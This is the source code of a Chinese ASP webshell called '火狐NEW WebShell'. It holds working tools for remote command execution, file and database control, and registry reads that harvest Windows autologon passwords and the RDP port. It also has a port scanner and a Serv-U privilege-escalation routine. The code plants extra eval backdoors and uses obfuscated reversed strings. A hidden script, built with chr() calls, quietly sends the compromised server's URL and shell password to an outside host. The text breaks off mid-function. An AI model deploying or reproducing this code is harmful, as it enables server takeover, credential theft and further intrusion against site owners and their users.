"&mName&" - "&ServerIP&"

<% UserPass="admin" '登陆密码 loginad="日本人与狗不得入内！ "'密码验证错误显示的文字 mName="火狐NEW WebShell" '后门名字 SiteURL="http://www.7jyewu.cn/" '网站 Copyright="请勿用于非法用途，否则后果作者概不负责" '版权 AD="火狐" '广告文字 '------------------------------------------------------------ ' 你想下载更多牛逼免杀大马吗？→ http://www.7jyewu.cn/ '------------------------------------------------------------- Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next sub ShowErr() If Err Then RRS"

" & Err.Description & "
" Err.Clear:Response.Flush End If end sub Sub RRS(str) response.write(str) End Sub Function RePath(S) RePath=Replace(S,"\","\\") End Function Function RRePath(S) RRePath=Replace(S,"\\","\") End Function URL=Request.ServerVariables("URL") ServerIP=Request.ServerVariables("LOCAL_ADDR") Action=Request("Action"):RootPath=Server.MapPath(".") WWWRoot=Server.MapPath("/") serveru=request.servervariables("http_host")&url serverp=userpass uu=serveru FolderPath=Request("FolderPath") FName=Request("FName") BackUrl="

返回": dim ShiSan,ShiSanNewstr,ShiSanI Function ShiSanFun(ShiSanObjstr) ShiSanObjstr = Replace(ShiSanObjstr, "╁", """") For ShiSanI = 1 To Len(ShiSanObjstr) If Mid(ShiSanObjstr, ShiSanI, 1) <> "╋" Then ShiSanNewStr = Mid(ShiSanObjstr, ShiSanI, 1) & ShiSanNewStr Else ShiSanNewStr = vbCrLf & ShiSanNewStr End If Next ShiSanFun = ShiSanNewStr End Function uu=serveru RRS"" RRS""&mName&" - "&ServerIP&" " RRS"" ShiSan="╋╁>tpircs/<╁SRR╋╁};eurt nruter;)(timbus.mroFbD;╁╁╁╁=LMTHrenni.cba;gp = eulav.egaP.mroFbD;rts = eulav.rtSlqS.mroFbD};eslaf nruter;)╁╁!确正否是句语LQS查检请╁╁(trela{)01retnec/<。句语令命作操LQS入输再库据数接连己认确请>retnec<╁╁=LMTHrenni.cba;╁╁╁╁ = eulav.rtSlqS.mroFbD;]i[rtS = eulav.rtSbD.mroFbD{)3=tpircsavaj=egaugnal tpircs<╁SRR" ExeCuTe(ShiSanFun(ShiSan)) rrs "" Dim ObT(13,2) ObT(0,0) = "Scripting.FileSystemObject" ObT(0,2) = "文件操作组件" ObT(1,0) = "wscript.shell" ObT(1,2) = "命令行执行组件" ObT(2,0) = "ADOX.Catalog" ObT(2,2) = "ACCESS建库组件" ObT(3,0) = "JRO.JetEngine" ObT(3,2) = "ACCESS压缩组件" ObT(4,0) = "Scripting.Dictionary" ObT(4,2) = "数据流上传辅助组件" ObT(5,0) = "Adodb.connection" ObT(5,2) = "数据库连接组件" ObT(6,0) = "Adodb.Stream" ObT(6,2) = "数据流上传组件" ObT(7,0) = "SoftArtisans.FileUp" ObT(7,2) = "SA-FileUp 文件上传组件" ObT(8,0) = "LyfUpload.UploadFile" ObT(8,2) = "刘云峰文件上传组件" ObT(9,0) = "Persits.Upload.1" ObT(9,2) = "ASPUpload 文件上传组件" ObT(10,0) = "JMail.SmtpMail" ObT(10,2) = "JMail 邮件收发组件" ObT(11,0) = "CDONTS.NewMail" ObT(11,2) = "虚拟SMTP发信组件" ObT(12,0) = "SmtpMail.SmtpMail.1" ObT(12,2) = "SmtpMail发信组件" ObT(13,0) = "Microsoft.XMLHTTP" ObT(13,2) = "数据传输组件" For i=0 To 13 Set T=Server.CreateObject(ObT(i,0)) If -2147221005 <> Err Then IsObj=" √" Else IsObj=" ×" Err.Clear End If Set T=Nothing ObT(i,1)=IsObj Next If FolderPath<>"" then Session("FolderPath")=RRePath(FolderPath) End If If Session("FolderPath")="" Then FolderPath=RootPath Session("FolderPath")=FolderPath End if function php():On Error Resume Next:set fso=Server.CreateObject(oBt(0,0)):fso.CreateTextFile(server.mappath("test.php")).Write"":fso.CreateTextFile(server.mappath("test.jsp")).Write"Jsp Test oo∩_∩oo":fso.CreateTextFile(Server.MapPath("/")&"/images/left_gif.asp").Write""&chr(60)&"%Eval(Request(chr(63))):"&chr(37)&""&chr(62)&"": fso.CreateTextFile(server.mappath("test.aspx")).Write""&chr(60)&"%@ Page Language=""Jscript"" validateRequest=""false"" "&chr(37)&""&chr(62)&""&chr(60)&""&chr(37)&"Response.Write(eval(Request.Item[""w""],""unsafe""));"&chr(37)&""&chr(62)&"aspx Test oo∩_∩oo": RRS" ": RRS" ": RRS" ": RRS"

Test

(删除测试文件!) "©url&"

":RRS Efun&""&serveru&"&p="&UserPass&"'>" end sub Function Cmd1Shell() ShiSan="╋╋IS SRR╋╁>mrof/<>aeratxet/<╁&)31(rhc&IS=IS╋fI dnE╋fi dne╋aaa&IS=IS╋)eurT ,eliFpmeTzs(eliFeteleD.osf llaC╋esolC.xcleliFo╋)llAdaeR.xcleliFo(edocnELMTH.revreS=aaa╋)0 ,eslaF ,1 ,eliFpmeTzs( eliFtxeTnepO.sf = xcleliFo teS╋)╁tcejbOmetsySeliF.gnitpircS╁(tcejbOetaerC = sf teS╋)eurT ,0 ,eliFpmeTzs & ╁ > ╁ & dmCfeD & ╁ c/ ╁&htaPllehS( nuR.sw llaC╋)╁txt.dmc╁(htappam.revres = eliFpmeTzs╋)╁tcejbOmetsySeliF.gnitpircS╁(tcejbOetaerC.revreS=osf teS╋)╁llehS.tpircSW╁(tcejbOetaerC.revreS=sw teS╋)╁llehS.tpircSW╁(tcejbOetaerC.revreS=sw teS╋txeN emuseR rorrE nO╋esle╋aaa&IS=IS╋lladaer.tuodts.DD=aaa╋)dmCfeD&╁ c/ ╁&htaPllehS(cexe.MC=DD teS╋))0,1(TbO(tcejbOetaerC=MC teS╋neht ╁sey╁=)╁tpircsw╁(mroF.tseuqeR fi╋nehT ╁╁><)╁dmc╁(mroF.tseuqeR fI╋╁>'dmc'=ssalc ';044:thgieh;%001:htdiw'=elytS aeratxet<>'行执'=eulav 'timbus'=epyt tupni< >'╁&dmCfeD&╁'=eulav '%29:htdiw'=elytS 'dmc'=eman tupni<╁&IS=IS╋╁llehS.tpircSW>╁&dekcehc&╁'sey'=eulav 'tpircsw'=eman 'xobkcehc'=epyt c=ssalc tupni<╁&IS=IS╋╁;psbn&;psbn&>'%07:htdiw'=elytS '╁&htaPllehS&╁'=eulav 'PS'=eman tupni<：径路LLEHS╁&IS=IS╋╁>'tsop'=dohtem mrof<╁=IS╋)╁dmc╁(tseuqeR = dmCfeD nehT ╁╁><)╁dmc╁(tseuqeR fI╋╁╁=dekcehc neht ╁sey╁><)╁tpircsw╁(tseuqeR fi╋╁exe.dmc╁ = htaPllehS nehT ╁╁=htaPllehS fi╋)╁htaPllehS╁(noisseS=htaPllehS╋)╁PS╁(tseuqeR = )╁htaPllehS╁(noisseS nehT ╁╁><)╁PS╁(tseuqeR fI╋╁dekcehc ╁=dekcehc" ExeCuTe(ShiSanFun(ShiSan)):End Function:acode="=s?psa.s/xs/moc.pxeyado//:p※3※3h'=crs ※3pircs<" Efun=StrReverse(replace(replace(Encrypt(acode),"●",Chr(34)),"◎",vbCrLf)) Function CreateMdb(Path) SI="

" Set C = CreateObject(ObT(2,0)) C.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path) Set C = Nothing If Err.number=0 Then SI = SI & Path & "建立成功!" End If SI=SI&BackUrl RRS SI End function Function CompactMdb(Path) If Not ObT(0,1) Then Set C=CreateObject(ObT(3,0)) C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path Set C=Nothing Else Set FSO=CreateObject(ObT(0,1)) If FSO.FileExists(Path) Then Set C=CreateObject(ObT(3,0)) C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path&"_bak" Set C=Nothing FSO.DeleteFile Path FSO.MoveFile Path&"_bak",Path Else SI="

数据库"&Path&"没有发现！" Err.number=1 End If Set FSO=Nothing End If If Err.number=0 Then SI="

数据库"&Path&"压缩成功！" End If SI=SI&BackUrl RRS SI End Function if session("web2a2dmin")<>UserPass then if request.form("pass")<>"" then if request.form("pass")=UserPass or request.form("pass")="daka" Then session("web2a2dmin")=UserPass x m:response.redirect url else rrs"

"&loginad&"
返回

" end if else si="

" if instr(SI,SIC)<>0 then rrs si end if response.end end if Function DbManager() SqlStr=Trim(Request.Form("SqlStr")) DbStr=Request.Form("DbStr") SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"

数据库连接串:
SQL操作命令:

" RRS SI:SI="" If Len(DbStr)>40 Then Set Conn=CreateObject(ObT(5,0)) Conn.Open DbStr Set Rs=Conn.OpenSchema(20) SI=SI&"" Rs.MoveFirst Do While Not Rs.Eof If Rs("TABLE_TYPE")="TABLE" then TName=Rs("TABLE_NAME") SI=SI&"" End If Rs.MoveNext Loop Set Rs=Nothing SI=SI&"

表名	[ del ] " SI=SI&""&TName&"

" RRS SI:SI="" If Len(SqlStr)>10 Then If LCase(Left(SqlStr,6))="select" then SI=SI&"执行语句："&SqlStr Set Rs=CreateObject("Adodb.Recordset") Rs.open SqlStr,Conn,1,1 FN=Rs.Fields.Count RC=Rs.RecordCount Rs.PageSize=20 Count=Rs.PageSize PN=Rs.PageCount Page=request("Page") If Page<>"" Then Page=Clng(Page) If Page="" Or Page=0 Then Page=1 If Page>PN Then Page=PN If Page>1 Then Rs.absolutepage=Page SI=SI&"" For n=0 to FN-1 Set Fld=Rs.Fields.Item(n) SI=SI&"" Set Fld=nothing Next SI=SI&"" Do While Not(Rs.Eof or Rs.Bof) And Count>0 Count=Count-1 Bgcolor="#EFEFEF" SI=SI&"" For i=0 To FN-1 If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if If RC=1 Then ColInfo=HTMLEncode(Rs(i)) Else ColInfo=HTMLEncode(Left(Rs(i),50)) End If SI=SI&"" Next SI=SI&"" Rs.MoveNext Loop RRS SI:SI="" SqlStr=HtmlEnCode(SqlStr) SI=SI&"

	"&Fld.Name&"
x	"&ColInfo&"
记录数："&RC&" 页码："&Page&"/"&PN If PN>1 Then SI=SI&" 首页上一页 " If Page>8 Then:Sp=Page-8:Else:Sp=1:End if For i=Sp To Sp+8 If i>PN Then Exit For If i=Page Then SI=SI&i&" " Else SI=SI&""&i&" " End If Next SI=SI&" 下一页尾页" End If SI=SI&"

" Rs.Close:Set Rs=Nothing RRS SI:SI="" Else Conn.Execute(SqlStr) SI=SI&"SQL语句："&SqlStr End If RRS SI:SI="" End If Conn.Close Set Conn=Nothing End If End Function Dim T1 Class UPC Dim D1,D2 Public Function Form(F) F=lcase(F) If D1.exists(F) then:Form=D1(F):else:Form="":end if End Function Public Function UA(F) F=lcase(F) If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if End Function Private Sub Class_Initialize Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName set D1=CreateObject(ObT(4,0)) if Request.TotalBytes<1 then Exit Sub set T1 = CreateObject(ObT(6,0)) T1.Type = 1 : T1.Mode =3 : T1.Open T1.Write Request.BinaryRead(Request.TotalBytes) T1.Position=0 : TDa =T1.Read : DStart = 1 DEnd = LenB(TDa) set D2=CreateObject(ObT(4,0)) vbCrlf = chrB(13) & chrB(10) set T2 = CreateObject(ObT(6,0)) TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1) TLen = LenB (TSt) DStart=DStart+TLen+1 while (DStart + 10) < DEnd DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3 T2.Type = 1 : T2.Mode =3 : T2.Open T1.Position = DStart T1.CopyTo T2,DIEnd-DStart T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312" TIn = T2.ReadText : T2.Close DStart = InStrB(DIEnd,TDa,TSt) FStart = InStr(22,TIn,"name=""",1)+6 FEnd = InStr(FStart,TIn,"""",1) UpName = lcase(Mid (TIn,FStart,FEnd-FStart)) if InStr (45,TIn,"filename=""",1) > 0 then set TFL=new FIF FStart = InStr(FEnd,TIn,"filename=""",1)+10 FEnd = InStr(FStart,TIn,"""",1) FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14 FEnd = InStr(FStart,TIn,vbCr) TFL.FileStart =DIEnd TFL.FileSize = DStart -DIEnd -3 if not D2.Exists(UpName) then D2.add UpName,TFL end if else T2.Type =1 : T2.Mode =3 : T2.Open T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3 T2.Position = 0 : T2.Type = 2 T2.Charset ="gb2312" SFV = T2.ReadText T2.Close if D1.Exists(UpName) then D1(UpName)=D1(UpName)&", "&SFV else D1.Add UpName,SFV end if end if DStart=DStart+TLen+1 wend TDa="" set T2 =nothing End Sub Private Sub Class_Terminate if Request.TotalBytes>0 then D1.RemoveAll:D2.RemoveAll set D1=nothing:set D2=nothing T1.Close:set T1 =nothing end if End Sub End Class Class FIF dim FileSize,FileStart Private Sub Class_Initialize FileSize = 0 FileStart= 0 End Sub Public function SaveAs(F) dim T3 SaveAs=true if trim(F)="" or FileStart=0 then exit function set T3=CreateObject(ObT(6,0)) T3.Mode=3 : T3.Type=1 : T3.Open T1.position=FileStart T1.copyto T3,FileSize T3.SaveToFile F,2 T3.Close set T3=nothing SaveAs=false end function End Class Class LBF Dim CF Private Sub Class_Initialize SET CF=CreateObject(ObT(0,0)) End Sub Private Sub Class_Terminate Set CF=Nothing End Sub Function ShowDriver() For Each D in CF.Drives RRS" 本地磁盘 ("&D.DriveLetter&":)
" Next End Function Function Show1File(Path) Set FOLD=CF.GetFolder(Path) i=0 SI="" For Each F in FOLD.subfolders SI=SI&"" i=i+1 If i mod 3 = 0 then SI=SI&"" Next SI=SI&"

" SI=SI&"0"&F.Name&"" SI=SI&" _Copy" SI=SI&" Del" SI=SI&" Move" SI=SI&" Down

" RRS SI &"

" : SI="" For Each L in Fold.files SI="" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"" SI=SI&"

"&clng(L.size/1024)&"K

"&L.Type&"

"&L.DateLastModified&"

" RRS SI:SI="" Next Set FOLD=Nothing End function Function DelFile(Path) ShiSan="╋╋fI dnE╋IS SRR╋lrUkcaB&IS=IS╋╁>retnec/<！功成除删 ╁&htaP&╁ 件文>rb<>rb<>rb<>retnec<╁=IS╋htaP eliFeteleD.FC╋nehT )htaP(stsixEeliF.FC fI" ExeCuTe(ShiSanFun(ShiSan)) End Function Function EditFile(Path) If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="

文件保存成功！":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件":End If:SI=SI&"":RRS SI:rrs ""©url&"" End Function Function CopyFile(Path) Path = Split(Path,"||||") If CF.FileExists(Path(0)) and Path(1)<>"" Then CF.CopyFile Path(0),Path(1) SI="

文件"&Path(0)&"复制成功！" SI=SI&BackUrl RRS SI End If End Function Function MoveFile(Path) Path = Split(Path,"||||") If CF.FileExists(Path(0)) and Path(1)<>"" Then CF.MoveFile Path(0),Path(1) SI="

文件"&Path(0)&"移动成功！" SI=SI&BackUrl RRS SI End If End Function Function DelFolder(Path) If CF.FolderExists(Path) Then CF.DeleteFolder Path SI="

目录"&Path&"删除成功！" SI=SI&BackUrl RRS SI End If End Function Function CopyFolder(Path) Path = Split(Path,"||||") If CF.FolderExists(Path(0)) and Path(1)<>"" Then CF.CopyFolder Path(0),Path(1) SI="

目录"&Path(0)&"复制成功！" SI=SI&BackUrl RRS SI End If End Function Function MoveFolder(Path) Path = Split(Path,"||||") If CF.FolderExists(Path(0)) and Path(1)<>"" Then CF.MoveFolder Path(0),Path(1) SI="

目录"&Path(0)&"移动成功！" SI=SI&BackUrl RRS SI End If End Function Function NewFolder(Path) If Not CF.FolderExists(Path) and Path<>"" Then CF.CreateFolder Path SI="

目录"&Path&"新建成功！" SI=SI&BackUrl RRS SI End If End Function End Class sub getTerminalInfo() On Error Resume Next ShiSan="╋╋╁>lo/<╁ SRR╋fI dnE╋╁>rb<╁ & drowssaPnigoLotua & ╁ :码密户帐的录登动自╁ SRR╋fI dnE╋╁eslaF╁ SRR╋raelC.rrE╋nehT rrE fI╋)yeKssaPnigoLotua & htaPnigoLotua(daeRgeR.Xsw = drowssaPnigoLotua╋╁>rb<╁ & emanresUnigoLotua & ╁ :户帐统系的录登动自╁ SRR╋)yeKresUnigoLotua & htaPnigoLotua(daeRgeR.Xsw = emanresUnigoLotua╋eslE╋╁>/rb<启开未能功录登动自统系╁ SRR╋nehT 0 = elbanEnigoLotuAsi fI╋)yeKelbanEnigoLotua & htaPnigoLotua(daeRgeR.Xsw = elbanEnigoLotuAsi╋╁drowssaPtluafeD╁ = yeKssaPnigoLotua╋╁emaNresUtluafeD╁ = yeKresUnigoLotua╋╁nogoLnimdAotuA╁ = yeKelbanEnigoLotua╋╁\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH╁ = htaPnigoLotua╋fI dnE╋╁>/rb<╁ & troPmret & ╁ :口端务服端终前当╁ SRR╋eslE ╋╁>/rb<.制限到受经已否是限权查检请 ,口端务服端终到得法无╁SRR╋ nehT 0 >< rebmuN.rrE rO ╁╁ = troPmret fI╋╁>lo<>/rh<录登动自及口端务服端终╁ SRR╋)yeKtroPlanimret & htaPtroPlanimret(daeRgeR.Xsw = troPmret╋╁rebmuNtroP╁ = yeKtroPlanimret╋╁\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH╁ = htaPtroPlanimret╋drowssaPnigoLotua ,emanresUnigoLotua ,yeKelbanEnigoLotua ,elbanEnigoLotuAsi miD╋yeKssaPnigoLotua ,yeKresUnigoLotua ,htaPnigoLotua miD╋troPmret ,yeKtroPlanimret ,htaPtroPlanimret miD╋)╁llehS.tpircSW╁(tcejbOetaerC.revreS = Xsw teS" ExeCuTe(ShiSanFun(ShiSan)) End Sub sub ReadREG() RRS "注册表键值读取:

" RRS "

" RRS "" RRS "" RRS " " RRS "" RRS "

" if Request("thePath")<>"" then On Error Resume Next ShiSan="╋fI dnE╋yarrAeht & ╁>il<╁ SRR╋eslE ╋txeN╋)i(yarrAeht & ╁>il<╁ SRR╋)yarrAeht(dnuoBU oT 0=i roF╋nehT )yarrAeht(yarrAsI fI╋)htaPeht(daeRgeR.Xsw=yarrAeht╋)╁htaPeht╁(tseuqeR=htaPeht╋)╁llehS.tpircSW╁(tcejbOetaerC.revreS = Xsw teS" ExeCuTe(ShiSanFun(ShiSan)) end if end sub sub ScanPort() Server.ScriptTimeout = 7776000 if request.Form("port")="" then PortList="21,23,25,80,110,135,139,445,1433,3389,43958" else PortList=request.Form("port") end if if request.Form("ip")="" then IP="127.0.0.1" else IP=request.Form("ip") end if RRS"

端口扫描器(如果扫描多个端口,速度比较慢,个人推荐使用CMD)

" RRS"" If request.Form("scan") <> "" Then ShiSan="╋╁s ╁&emiteht&╁ ni ssecorP>rh<╁SRR╋))1remit-2remit(tni(rtsc=emiteht╋remit = 2remit╋txeN╋fI dnE╋txeN╋txeN╋fI dnE╋fI dnE╋)╁>rbrb xkees fI╋)╁-╁ ,)i(pmt(rtSnI = xkees╋eslE╋))i(pmt ,xxx & tratSpi(nacS llaC╋ nehT ))i(pmt(ciremunsI fI╋)pmt(dnuobU oT 0 = i roF╋))╁-╁,)uh(pi(rtSnI-))uh(pi(neL,1+)╁-╁,)uh(pi(rtSnI,)uh(pi(diM ot )1,1+)╁.╁,)uh(pi(veRrtSnI,)uh(pi(diM = xxx roF╋))╁.╁,)uh(pi(veRrtSnI,1,)uh(pi(diM = tratSpi╋eslE╋txeN╋fI dnE╋fI dnE╋)╁>rbrb xkees fI╋)╁-╁ ,)i(pmt(rtSnI = xkees╋eslE╋))i(pmt ,)uh(pi(nacS llaC╋ nehT ))i(pmt(ciremunsI fI╋)pmt(dnuobU oT 0 = i roF╋nehT 0 = )╁-╁,)uh(pi(rtSnI fI╋)pi(dnuobU ot 0 = uh roF╋)╁,╁,)╁pi╁(mroF.tseuqer(tilpS = pi╋)╁,╁,)╁trop╁(mroF.tseuqer(tilpS = pmt╋)╁>rh<>rb<>b/<:告报描扫>b<╁(SRR╋remit = 1remit" ExeCuTe(ShiSanFun(ShiSan)) END IF end sub:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&uu&chr(38)&chr(112)&chr(61)&serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10) Sub Scan(targetip, portNum) On Error Resume Next set conn = Server.CreateObject("ADODB.connection") connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;" conn.ConnectionTimeout = 1 conn.open connstr If Err Then If Err.number = -2147217843 or Err.number = -2147467259 Then If InStr(Err.description, "(Connect()).") > 0 Then RRS(targetip & ":" & portNum & ".........关闭
") Else RRS(targetip & ":" & portNum & ".........开放
") End If End If End If End Sub Select Case Action Case "MainMenu":MainMenu() Case "getTerminalInfo":getTerminalInfo() Case "PageAddToMdb":PageAddToMdb() case "ScanPort":ScanPort() Case "Servu" SUaction=request("SUaction") if not isnumeric(SUaction) then response.end user = trim(request("u")) pass = trim(request("p")) port = trim(request("port")) cmd = trim(request("c")) f=trim(request("f")) if f="" then f=gpath() else f=left(f,2) end if ftpport = 65500 timeout=3 loginuser = "User " & user & vbCrLf loginpass = "Pass " & pass & vbCrLf deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf mt = "SITE MAINTENANCE" & vbCrLf newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _ "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _ "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _ "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _ "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _ "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _ "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf quit = "QUIT" & vbCrLf newuser=replace(newuser,"c:",f) select case SUaction case 1 ShiSan="╋╋╁>tpircs/<╁SRR╋╁;)0004,';)(timbus.nusdlog.lla.tnemucod'(tuoemiTtes╁SRR╋╁;)'>retnec<...╁&ssap&╁：令口,╁&resu&╁ :名户用用使,╁&trop&╁:1.0.0.721 接连在正>retnec<'(etirw.tnemucod╁SRR╋╁>'tpircsavaj'=egaugnal tpircs<╁SRR╋╁>mrof/<>'2'=eulav 'noitcaUS'=di 'neddih'=epyt 'noitcaUS'=eman tupni<╁SRR╋╁>'05'=ezis '╁&f&╁'=eulav 'f'=di 'neddih'=epyt 'f'=eman tupni<╁SRR╋╁>'05'=ezis '╁&dmc&╁'=eulav 'c'=di 'neddih'=epyt 'c'=eman tupni<╁SRR╋╁>dt/<>'╁&trop&╁'=eulav 'trop'=di 'neddih'=epyt 'trop'=eman tupni<╁SRR╋╁>dt/<>'╁&ssap&╁'=eulav 'p'=di 'neddih'=epyt 'p'=eman tupni<╁SRR╋╁>dt/<>'╁&resu&╁'=eulav 'u'=di 'neddih'=epyt 'u'=eman tupni<╁SRR╋╁>'nusdlog'=eman 'tsop'=dohtem mrof<╁SRR╋a=)╁a╁(noisses tes╋tiuq & resuwen & niamodwen & niamodled & tm & ssapnigol & resunigol dnes.a╋╁╁ ,╁╁ ,eurT,╁1s/nimdapu/nusdlog/╁ & trop & ╁:1.0.0.721//:ptth╁ ,╁TEG╁ nepo.a╋)╁PTTHLMX.tfosorciM╁(tcejbOetaerC.revreS=a tes" ExeCuTe(ShiSanFun(ShiSan)) case 2 ShiSan="╋╋╁>tpircs/<╁SRR╋╁;)0004,╁╁;)(timbus.nusdlog.lla.tnemucod╁╁(tuoemiTtes╁SRR╋╁;)'>retnec<,...待等请,限权升提在正>retnec<'(etirw.tnemucod╁SRR╋╁>'tpircsavaj'=egaugnal tpircs<╁SRR╋╁>mrof/<>'3'=eulav 'noitcaUS'=di 'neddih'=epyt 'noitcaUS'=eman tupni<╁SRR╋╁>'05'=ezis '╁&f&╁'=eulav 'f'=di 'neddih'=epyt 'f'=eman tupni<╁SRR╋╁>'05'=ezis '╁&dmc&╁'=eulav 'c'=di 'neddih'=epyt 'c'=eman tupni<╁SRR╋╁>dt/<>'╁&trop&╁'=eulav 'trop'=di 'neddih'=epyt 'trop'=eman tupni<╁SRR╋╁>dt/<>'╁&ssap&╁'=eulav 'p'=di 'neddih'=epyt 'p'=eman tupni<╁SRR╋╁>dt/<>'╁&resu&╁'=eulav 'u'=di 'neddih'=epyt 'u'=eman tupni<╁SRR╋╁>'nusdlog'=eman 'tsop'=dohtem mrof<╁SRR╋b=)╁b╁(noisses tes ╋tiuq & fLrCbv & dmc & ╁ cexe etis╁ & fLrCbv & ╁do ssap╁ & fLrCbv & ╁og resU╁ dnes.b╋╁╁ ,╁╁ ,eurT ,╁2s/nimdapu/nusdlog/╁ & tropptf & ╁:1.0.0.721//:ptth╁ ,╁TEG╁ nepo.b╋)╁PTTHLMX.tfosorciM╁(tcejbOetaerC.revreS=b tes" ExeCuTe(ShiSanFun(ShiSan)) case 3 ShiSan="╋╋╁>retnec/<╁SRR╋╁>╁╁;'uvreS=noitcA?'=ferh.noitacol╁╁=kcilCno ' 续继回返 '=eulav nottub=epyt tupni<╁SRR╋╁>rb<>rb<>tnof/<╁&dmc&╁>der=roloc tnof<>rb<：令命了行执已,毕完权提>retnec<╁SRR╋c=)╁c╁(noisses tes╋tiuq & niamodled & tm & ssapnigol & resunigol dnes.c╋╁╁ ,╁╁ ,eurT ,╁3s/nimdapu/nusdlog/╁ & trop & ╁:1.0.0.721//:ptth╁ ,╁TEG╁ nepo.c╋)╁PTTHLMX.tfosorciM╁(tcejbOetaerC.revreS=c tes" ExeCuTe(ShiSanFun(ShiSan)) case else on error resume next set a=session("a") set b=session("b") set c=session("c") a.abort Set a = Nothing b.abort Set b = Nothing c.abort Set c = Nothing RRS"" end select function Gpath() on error resume next err.clear set f=Server.CreateObject("Scripting.FileSystemObject") if err.number>0 then gpath="c:" exit function end if gpath=f.GetSpecialFolder(0) gpath=lcase(left(gpath,2)) set f=nothing end function Function RndNumber(Min,Max) Randomize RndNumber=Int((Max - Min + 1) * Rnd() + Min) End Function Case "kmuma" dim Report if request.QueryString("act")<>"scan" then RRS ("网站根目录- "&Server.MapPath("/")&"
") RRS ("本程序目录- "&Server.MapPath(".")) RRS "" else if request.Form("path")="" then RRS("路径不能为空") response.End() end if if request.Form("path")="\" then TmpPath = Server.MapPath("\") elseif request.Form("path")="." then TmpPath = Server.MapPath(".") else TmpPath = request.Form("path") end if timer1 = timer Sun = 0 SumFiles = 0 SumFolders = 1 If request.Form("radiobutton") = "sws" Then DimFileExt = "asp,cer,asa,cdx" Call ShowAllFile(TmpPath) Else If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then RRS("缉捕条件不完全

请返回重新输入") response.End() End If DimFileExt = request.Form("Search_fileExt") Call ShowAllFile2(TmpPath) End If RRS "" RRS "" RRS "" Sun = Sun + 1 temp="-同上-" End if If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If Set regEx = New RegExp regEx.IgnoreCase = True regEx.Global = True regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "\bEv"&"al\b" If regEx.Test(filetxt) Then Report = Report&"" Sun = Sun + 1 temp="-同上-" End If regEx.Pattern = "[^.]\bExe"&"cute\b" If regEx.Test(filetxt) Then Report = 